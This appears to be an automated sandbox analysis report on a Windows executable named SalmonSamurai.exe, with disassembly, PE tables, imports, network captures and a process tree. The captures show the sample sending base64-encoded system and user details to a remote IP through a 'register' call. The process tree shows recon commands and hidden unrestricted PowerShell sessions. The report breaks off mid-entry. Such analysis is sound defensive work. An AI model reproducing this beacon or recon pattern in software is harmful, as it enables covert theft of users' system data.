                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                          mov dword ptr [esp+20h], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                          call dword ptr [004080A0h]
                                                                                                                                                                                                                                          mov esi, dword ptr [004080A4h]
                                                                                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                                                                          call esi
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          jne 00007FE58C4EF6AAh
                                                                                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          call esi
                                                                                                                                                                                                                                          mov ax, word ptr [esp+48h]
                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                                                                                          neg ax
                                                                                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                                                                          not eax
                                                                                                                                                                                                                                          and eax, ecx
                                                                                                                                                                                                                                          mov word ptr [esp+00000148h], ax
                                                                                                                                                                                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                                                                          jnc 00007FE58C4EF678h
                                                                                                                                                                                                                                          and word ptr [esp+42h], 0000h
                                                                                                                                                                                                                                          mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                                                                          mov dword ptr [00429B18h], eax
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          mov ah, byte ptr [esp+38h]
                                                                                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                                                                                          or eax, ecx
                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                          mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                                                                                          or eax, ecx
                                                                                                                                                                                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0xbff0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4695db8 | 0x2368 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x66d7 | 0x6800 | 4e97e586f167bf2d2eddcdba22e25c0e | False | 0.6615835336538461 | data | 6.441769857560007 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1358 | 0x1400 | bd82d08a08da8783923a22b467699302 | False | 0.4431640625 | data | 5.103358601944578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x1fb78 | 0x600 | e411b225ac3cd03a5dad8143ae82958d | False | 0.5091145833333334 | data | 4.122928093833695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x2a000 | 0x1c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x46000 | 0xbff0 | 0xc000 | 951d482944a10118ca7b1c23ecd70b02 | False | 0.7726847330729166 | data | 6.87682750773503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x462b0 | 0x8f8d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9947209447876133 |
| RT_ICON | 0x4f240 | 0xea8 | data | English | United States | 0.007196162046908316 |
| RT_ICON | 0x500e8 | 0x8a8 | data | English | United States | 0.01128158844765343 |
| RT_ICON | 0x50990 | 0x568 | data | English | United States | 0.014450867052023121 |
| RT_ICON | 0x50ef8 | 0x468 | data | English | United States | 0.015957446808510637 |
| RT_ICON | 0x51360 | 0x2e8 | data | English | United States | 0.020161290322580645 |
| RT_ICON | 0x51648 | 0x128 | data | English | United States | 0.04391891891891892 |
| RT_DIALOG | 0x51770 | 0x202 | data | English | United States | 0.4085603112840467 |
| RT_DIALOG | 0x51978 | 0xf8 | data | English | United States | 0.6290322580645161 |
| RT_DIALOG | 0x51a70 | 0xee | data | English | United States | 0.6302521008403361 |
| RT_GROUP_ICON | 0x51b60 | 0x68 | data | English | United States | 0.23076923076923078 |
| RT_MANIFEST | 0x51bc8 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076 |
| DLL | Import |
|---|---|
| ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW |
| SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW |
| ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree |
| COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create |
| USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics |
| GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor |
| KERNEL32.dll | RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 17:04:57.339353085 CET | 62813 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 17:04:57.339596987 CET | 61144 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 17:04:57.478662968 CET | 53 | 61144 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 17:04:57.479599953 CET | 53 | 62813 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 17:04:57.339353085 CET | 192.168.2.4 | 1.1.1.1 | 0xd53a | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:04:57.339596987 CET | 192.168.2.4 | 1.1.1.1 | 0x46c8 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 17:04:57.478662968 CET | 1.1.1.1 | 192.168.2.4 | 0x46c8 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 23, 2024 17:04:57.479599953 CET | 1.1.1.1 | 192.168.2.4 | 0xd53a | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:04:57.479599953 CET | 1.1.1.1 | 192.168.2.4 | 0xd53a | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          • 89.187.28.253
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49862 | 89.187.28.253 | 80 | 1272 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 17:06:01.459697008 CET | 608 | OUT | GET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV9NOE5DMVVfdHJ1ZV9EUFNfWElfV2luZG93cyAxMCBQcm9fMTIzIG1pbnV0ZXMgKDAuMDUgaG91cnMpX0M6XFVzZXJzXGpvbmVzXzA2MTU0NF9qb25lc19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xqb25lc1xBcHBEYXRhXExvY2FsXFRlbXBfSk9ORVMtUENfX0ludGVsNjQgRmFtaWx5IDYgTW9kZWwgMTQzIFN0ZXBwaW5nIDgsIEdlbnVpbmVJbnRlbF9BTUQ2NF9DOl8yX0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1
                                                                                                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                          User-Agent: axios/0.27.2
                                                                                                                                                                                                                                          Host: 89.187.28.253
                                                                                                                                                                                                                                          Connection: close
Dec 23, 2024 17:06:02.860691071 CET | 321 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                          Date: Mon, 23 Dec 2024 16:06:02 GMT
                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Dec 23, 2024 17:07:02.871927023 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 172.64.41.3 | 443 | 6340 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:04:58 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                          Content-Type: application/dns-message
2024-12-23 16:04:58 UTC | 128 | OUT
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
2024-12-23 16:04:59 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          Date: Mon, 23 Dec 2024 16:04:59 GMT
                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                          CF-RAY: 8f69972dc9fe8c83-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
2024-12-23 16:04:59 UTC | 468 | IN
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49749 | 172.64.41.3 | 443 | 6340 | C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:04:59 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                          Content-Type: application/dns-message
2024-12-23 16:04:59 UTC | 128 | OUT
                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP



Target ID: 0
Start time: 11:04:22
Start date: 23/12/2024
Path: C:\Users\user\Desktop\SalmonSamurai.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SalmonSamurai.exe"
Imagebase: 0x400000
File size: 74'023'200 bytes
MD5 hash: 4CE4A1F912D0B9840A7F568454C6C45A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 4
Start time: 11:04:41
Start date: 23/12/2024
Path: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Imagebase: 0x7ff6f6bb0000
File size: 160'143'360 bytes
MD5 hash: 6EA18AE76085155E2681CCA92745A9AF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: false

Target ID:6
Start time:11:04:43
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
Imagebase:0x7ff68ea40000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:11:04:43
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:11:04:43
Start date:23/12/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff6d1a30000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:04:43
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Imagebase:0x7ff68ea40000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:11:04:43
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:11:04:44
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:11:04:44
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:11:04:44
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:11:04:44
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:11:04:44
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:11:04:45
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                                                                                          Imagebase:0x7ff6f6bb0000
                                                                                                                                                                                                                                          File size:160'143'360 bytes
                                                                                                                                                                                                                                          MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:11:04:49
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff6f6bb0000
                                                                                                                                                                                                                                          File size:160'143'360 bytes
                                                                                                                                                                                                                                          MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                                                                                          Imagebase:0x7ff68ea40000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                                                                                          Imagebase:0x7ff774c50000
                                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

Target ID:23
Start time:11:05:13
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:11:05:13
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:11:05:14
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
